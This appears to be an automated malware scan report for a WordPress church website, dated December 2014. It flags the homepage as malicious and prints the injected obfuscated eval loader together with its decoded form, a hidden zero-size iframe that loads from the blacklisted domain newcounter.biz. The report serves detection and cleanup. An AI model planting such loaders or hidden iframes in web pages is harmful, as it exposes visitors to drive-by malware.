Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wesleychapelum.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.wesleychapelum.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 18 Dec 2014 12:40:07 GMT Pragma: no-cache Location: http://wesleychapelum.org/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.9 Resin/3.1.10 Sun-ONE-ASP/4.0.3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d1a2159ba6480a6f8892aca2ed8de80e; path=/ X-Pingback: http://wesleychapelum.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://wesleychapelum.org/ | 200 OK Content-Length: 65097 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: newcounter.biz eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|newcounter|width|biz||php|tag13|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://newcounter.biz/tag13.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://newcounter.biz/tag13.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://newcounter.biz/tag13.php"></ifee> | ||
http://wesleychapelum.org/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 11205 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/utils.min.js?ver=4.0.1 | 200 OK Content-Length: 1821 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/plupload/plupload.full.min.js?ver=2.1.1 | 200 OK Content-Length: 108163 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/json2.min.js?ver=2011-02-23 | 200 OK Content-Length: 2950 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-content/plugins/download-manager/bootstrap/js/bootstrap.min.js?ver=4.0.1 | 200 OK Content-Length: 27913 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-content/plugins/download-manager/js/jquery.cookie.js?ver=4.0.1 | 200 OK Content-Length: 2207 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-content/plugins/download-manager/js/front.js?ver=4.0.1 | 200 OK Content-Length: 774 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0 | 200 OK Content-Length: 14720 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4 | 200 OK Content-Length: 35806 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 12113 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/underscore.min.js?ver=1.6.0 | 200 OK Content-Length: 14424 Content-Type: application/x-javascript | clean |
http://wesleychapelum.org/wp-includes/js/shortcode.min.js?ver=4.0.1 | 200 OK Content-Length: 2589 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wesleychapelum.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 12:40:08 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.9 Resin/3.1.10 Sun-ONE-ASP/4.0.3
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wesleychapelum.org/>; rel=shortlink
Set-Cookie: PHPSESSID=c4a64586d749e714a4eb0a9df1ddb728; path=/
X-Pingback: http://wesleychapelum.org/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: wesleychapelum.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 12:40:08 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.9 Resin/3.1.10 Sun-ONE-ASP/4.0.3
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wesleychapelum.org/>; rel=shortlink
Set-Cookie: PHPSESSID=c4a64586d749e714a4eb0a9df1ddb728; path=/
X-Pingback: http://wesleychapelum.org/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: wesleychapelum.org
Referer: http://www.google.com/search?q=wesleychapelum.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wesleychapelum.org
Referer: http://www.google.com/search?q=wesleychapelum.org
Result:
The result is similar to the first query. There are no suspicious redirects found.